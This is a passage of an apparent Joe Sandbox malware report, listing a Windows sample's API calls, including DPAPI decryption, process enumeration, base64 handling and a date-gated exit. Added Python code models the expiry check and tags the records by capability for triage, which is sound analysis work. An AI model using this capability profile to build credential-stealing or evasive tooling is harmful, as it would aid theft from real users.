                                      • ExitProcess.KERNEL32 ref: 00D46C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 1f2815c5f66ac7a42da21c4ca12c619df9fdb3f3a667e4e8ae7d2db83fe357b7
                                      • Instruction ID: fc7de8b9221dd317565f690f47397fc6c82a39d8390807c995204716bcf8f0ee
                                      • Opcode Fuzzy Hash: 1f2815c5f66ac7a42da21c4ca12c619df9fdb3f3a667e4e8ae7d2db83fe357b7
                                      • Instruction Fuzzy Hash: 5721ED75D00208ABCF15DFE4E8459EEB7B5FF48300F048529E446A3254EB35A604CB65
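The record above (GetSystemTime, sscanf, two SystemTimeToFileTime calls, ExitProcess, all within a few dozen bytes of 00D46C0C) has the shape of a build-expiry gate: a date literal is parsed with sscanf into a SYSTEMTIME, both it and the current time are converted to FILETIME so they can be compared as 64-bit tick counts, and the process exits when the deadline has passed. The listing alone does not prove that policy, so the following is an added example of the mechanics only, not code from the sample or from the Joe Sandbox report; the `YYYY-MM-DD` literal format, the `%d-%d-%d` sscanf pattern and the "exit when now is later than the deadline" direction are assumptions to be confirmed against the disassembly.

```python
"""Mechanics of a GetSystemTime / sscanf / SystemTimeToFileTime x2 / ExitProcess
chain read as a build-expiry gate.  Added example; not code from the sample or
the report.  Assumed: the deadline is a 'YYYY-MM-DD' literal and the process
exits once the current UTC time is past it."""
import re
from datetime import datetime, timezone
from typing import Optional, Tuple

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME zero point
TICKS_PER_SEC = 10_000_000                                    # one FILETIME tick = 100 ns


def utc(*ymdhms: int) -> datetime:
    """Build a UTC datetime; GetSystemTime reports UTC, never local time."""
    return datetime(*ymdhms, tzinfo=timezone.utc)


def system_time_to_file_time(dt: datetime) -> int:
    """SystemTimeToFileTime equivalent: 100-ns ticks since 1601-01-01 UTC, in integer math."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SEC + delta.microseconds * 10


def filetime_parts(ticks: int) -> Tuple[int, int]:
    """(dwLowDateTime, dwHighDateTime) exactly as the FILETIME struct lays them out."""
    return ticks & 0xFFFFFFFF, (ticks >> 32) & 0xFFFFFFFF


# Stand-in for sscanf(s, "%d-%d-%d", &y, &m, &d): assumed format.
DEADLINE_FMT = re.compile(r"\s*(\d+)-(\d+)-(\d+)")


def parse_deadline(text: str) -> Optional[datetime]:
    """sscanf-like: leading whitespace skipped, parsing stops at the first non-matching
    character, and a short read (fewer than three conversions) is a failure."""
    m = DEADLINE_FMT.match(text)
    if not m:
        return None
    year, month, day = (int(g) for g in m.groups())
    try:
        return utc(year, month, day)
    except ValueError:          # e.g. month 13: SystemTimeToFileTime would fail on it as well
        return None


def should_exit(now: datetime, deadline_text: str) -> bool:
    """True when this gate would reach ExitProcess.  An unparsable deadline is treated
    as 'no gate' here; a real build may do the opposite, so read the failure branch."""
    deadline = parse_deadline(deadline_text)
    if deadline is None:
        return False
    now_ft, deadline_ft = system_time_to_file_time(now), system_time_to_file_time(deadline)
    # Comparing the two tick counts is what a high-DWORD-then-low-DWORD compare,
    # or CompareFileTime, does on the two FILETIME structs the sample produces.
    return now_ft > deadline_ft


if __name__ == "__main__":
    print(should_exit(datetime.now(timezone.utc), "2024-10-01"))
```

When checking this in a debugger, break on the second SystemTimeToFileTime and read both FILETIME structs: the low DWORD is compared only when the high DWORDs are equal, so a sample that compares just dwHighDateTime has a granularity of about 7 minutes (2^32 ticks), which is enough for a kill date.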
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D372AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D372B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D372E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D37304
                                      • LocalFree.KERNEL32(?), ref: 00D3730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: d5f01764cf93fdbc51a357c1c7f02b13034b98903f71cabda2c2d4302241bc47
                                      • Instruction ID: 292c38c52069bdd85d6fc9331ba600636f6ee67c86e0ddca6ac3b14eeafc7e02
                                      • Opcode Fuzzy Hash: d5f01764cf93fdbc51a357c1c7f02b13034b98903f71cabda2c2d4302241bc47
                                      • Instruction Fuzzy Hash: F90112B5A44308BBDB20DFE4DC46F9D7778AB44B00F104545FB45AB2C4D675BA008B64
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D497AE
                                      • Process32First.KERNEL32(00D50ACE,00000128), ref: 00D497C2
                                      • Process32Next.KERNEL32(00D50ACE,00000128), ref: 00D497D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00D497EC
                                      • CloseHandle.KERNEL32(00D50ACE), ref: 00D4980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 292a334acc202dbfa979999881b211db2d9ae69f2b404d6bad769f30e165b707
                                      • Instruction ID: cf3f83032378ae2d43b7c5d567c4de5a9e073c7223ec750f45086c7f563a5fa0
                                      • Opcode Fuzzy Hash: 292a334acc202dbfa979999881b211db2d9ae69f2b404d6bad769f30e165b707
                                      • Instruction Fuzzy Hash: 00012175A10208EBDB21DFA9C954BDEBBB9BF08700F104588E589E7240D779EB40CF60
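The four API-bearing records above (base64 decode with CryptStringToBinaryA followed by lstrcat at 00D3C971; the GetSystemTime/sscanf/SystemTimeToFileTime/ExitProcess chain at 00D46C0C; DPAPI decryption via CryptUnprotectData at 00D372AD; Toolhelp process enumeration with StrCmpCA at 00D497AE) are the parts of this dump an analyst actually triages, and the surrounding metadata is what gets in the way. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a parser for this record layout that turns each `APIs`/`Strings` block into a structured record, tags it by the API set it calls, and decodes the stack arguments Joe Sandbox managed to resolve. The capability names and rules are this example's own choices; the sample text is copied from the records above.

```python
"""Parser and capability tagger for Joe Sandbox function records.
Added example, not part of the Joe Sandbox report and not code from the
analysed sample.  Tag names and rules are this example's own choices."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the API lines of the four API-bearing records above, copied
# from the report, plus a few of their metadata lines.
SAMPLE = """\
APIs
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C971
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C97C
• lstrcat.KERNEL32(?,00D50B47), ref: 00D3CA43
• lstrcat.KERNEL32(?,00D50B4B), ref: 00D3CA57
• lstrcat.KERNEL32(?,00D50B4E), ref: 00D3CA78
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: lstrcat$BinaryCryptStringlstrlen
• String ID:
• API String ID: 189259977-0
APIs
• GetSystemTime.KERNEL32(?), ref: 00D46C0C
• sscanf.NTDLL ref: 00D46C39
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C52
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C60
• ExitProcess.KERNEL32 ref: 00D46C7A
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D372AD
• RtlAllocateHeap.NTDLL(00000000), ref: 00D372B4
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D372E1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D37304
• LocalFree.KERNEL32(?), ref: 00D3730E
Similarity
• API String ID: 2609814428-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D497AE
• Process32First.KERNEL32(00D50ACE,00000128), ref: 00D497C2
• Process32Next.KERNEL32(00D50ACE,00000128), ref: 00D497D7
• StrCmpCA.SHLWAPI(?,00000000), ref: 00D497EC
• CloseHandle.KERNEL32(00D50ACE), ref: 00D4980A
"""

API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)"          # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                 # optional (arg,arg,...); absent for sscanf
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"    # call-site address
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # stack values as printed; "?" means Joe Sandbox could not resolve it
    ref: int          # address of the call instruction


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def api_names(self) -> List[str]:
        return [c.name for c in self.calls]


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs'/'Strings' block; other heading lines are skipped."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
            continue
        m = FIELD_LINE.match(line)
        if m:
            current.fields[m.group("key").strip()] = m.group("val").strip()
    return records


def arg_int(call: ApiCall, index: int) -> Optional[int]:
    """Stack argument as an int, or None for a missing or unresolved ('?') value."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


# Every API in the set must appear in the same function for the tag to apply.
CAPABILITY_RULES: Dict[str, set] = {
    "base64-decode":        {"CryptStringToBinaryA"},
    "dpapi-decrypt":        {"CryptUnprotectData"},
    "process-enum-by-name": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "time-gated-exit":      {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"},
}


def tag_record(rec: FunctionRecord) -> List[str]:
    present = set(rec.api_names)
    return sorted(tag for tag, needed in CAPABILITY_RULES.items() if needed <= present)


# dwFlags bits of CreateToolhelp32Snapshot (tlhelp32.h).
TH32CS_FLAGS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
                0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}


def decode_snapshot_flags(value: int) -> List[str]:
    return [name for bit, name in sorted(TH32CS_FLAGS.items()) if value & bit]


def summarize(text: str) -> List[Dict[str, object]]:
    """Per record: tags, the call chain in address order, and decoded Toolhelp flags if any."""
    out: List[Dict[str, object]] = []
    for rec in parse_records(text):
        entry: Dict[str, object] = {"tags": tag_record(rec), "chain": rec.api_names}
        for call in rec.calls:
            flags = arg_int(call, 0) if call.name == "CreateToolhelp32Snapshot" else None
            if flags is not None:
                entry["snapshot_flags"] = decode_snapshot_flags(flags)
        out.append(entry)
    return out


if __name__ == "__main__":
    for entry in summarize(SAMPLE):
        print(entry["tags"], "->", " > ".join(entry["chain"]))
```

Two details worth reading off the decoded arguments: `Process32First(00D50ACE,00000128)` passes 0x128 = 296, the size of a 32-bit ANSI PROCESSENTRY32, so the name compared by StrCmpCA is the ANSI szExeFile field, and StrCmpCA is a case-sensitive compare, so any target list the sample carries must match the executable's exact casing. The `GetProcessHeap.KERNEL32(00000008,00000400)` entry is Joe Sandbox printing whatever sits on the stack at the call site; GetProcessHeap takes no arguments, and 8 / 0x400 are most plausibly the HEAP_ZERO_MEMORY flag and 1 KiB size already pushed for the RtlAllocateHeap call that follows.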
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 4q2$ IM?$AmW?$o!wZ
                                      • API String ID: 0-2740203039
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00D351D4,40000001,00000000,00000000,?,00D351D4), ref: 00D49050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0167E500,00000000,?,00D50DF8,00000000,?,00000000,00000000), ref: 00D47BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0167E500,00000000,?,00D50DF8,00000000,?,00000000,00000000,?), ref: 00D47C0D
                                      • wsprintfA.USER32 ref: 00D47C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 3z$C)&l$zgeq
                                      • API String ID: 0-1430241905
                                      APIs
                                      • CoCreateInstance.COMBASE(00D4E120,00000000,00000001,00D4E110,00000000), ref: 00D439A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D43A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D3A2F3
                                      • LocalFree.KERNEL32(?), ref: 00D3A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: 2a1c7e70581d0f926d02e2d9a3524802fe642d94db12d19079424d830665d49d
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: FEA233B1C042688AEF28EB68C8917EDB7B1FF45310F1842AAD5567B281D735DE85CB70
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: 80d8805f7137c030b3bfa1f046791c9ca8492af86c237c89f0282eaf7de57621
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: 9CE1E2316083429FC725EF28C8817AEB7E2EFC9300F59492DE5D997291DB319855CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 40ab15d4d158a37a4707faaff9b63966758fe84951e4202d3b9889a6db08423f
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 8AE1D531A083129FCB24EF18C8917AEB7E6EFC5314F15892DE8999B251D730EC45CB66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
